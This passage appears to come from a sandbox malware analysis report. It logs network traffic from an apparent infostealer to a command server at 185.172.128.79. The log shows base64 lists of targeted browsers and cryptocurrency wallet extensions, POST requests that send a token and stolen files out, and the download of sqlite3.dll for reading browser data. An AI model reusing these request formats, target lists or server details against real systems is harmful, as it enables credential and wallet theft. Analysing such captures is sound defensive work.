5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:48.374409914 CET430INData Raw: 68 79 62 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZ
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:48.548130035 CET468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGH
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 267
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="message"plugins------AECAECFCAAEBFHIEHDGH--
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:48.871295929 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:48 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 5416
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIF
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:48.871316910 CET1286INData Raw: 64 68 62 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: dhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZ
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:48.871520042 CET1286INData Raw: 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: cmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramV
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:48.871536016 CET1286INData Raw: 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:48.871568918 CET468INData Raw: 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: bXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGN
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:49.105127096 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHC
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 8087
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:49.105191946 CET8087OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:49.441387892 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:49 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:50.081480026 CET93OUTGET /15f649199f40275b/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:50.401521921 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1106998
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:50.401638985 CET1286INData Raw: 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: @B/81s:<R@B/92P @B
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:50.401680946 CET1286INData Raw: 5d c3 8d b4 26 00 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q|$D$4$*|$D$4$s|$D$4$
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:50.401721001 CET1286INData Raw: 08 85 d2 74 04 0f b6 42 14 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tB]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:50.401781082 CET1286INData Raw: 18 83 e3 7f c7 42 04 00 00 00 00 b0 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: BLpuBpuBxMMuMZ2Mx]uZxu
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:52.405422926 CET952OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 751
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
